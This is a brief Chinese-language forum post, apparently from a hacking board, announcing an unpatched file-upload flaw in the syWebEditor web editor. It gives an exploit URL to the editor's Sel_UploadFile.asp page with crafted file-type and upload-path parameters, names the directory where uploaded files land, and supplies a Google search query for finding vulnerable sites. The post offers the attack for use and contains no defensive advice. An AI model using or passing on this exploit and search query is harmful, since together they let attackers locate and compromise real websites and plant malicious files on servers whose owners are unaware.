syWebEditor编辑器最新0day
<P>syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的</P><P>编辑器一样。</P>
<P>exp:</P>
<P>http://www.heimian.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%7C&filePathType=1&filePath=/PhotoFile/ProFile/</P>
<P>上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。</P>
<P>谷歌一下:inurl:syWebEditor</P>
<DIV></DIV>
页:
[1]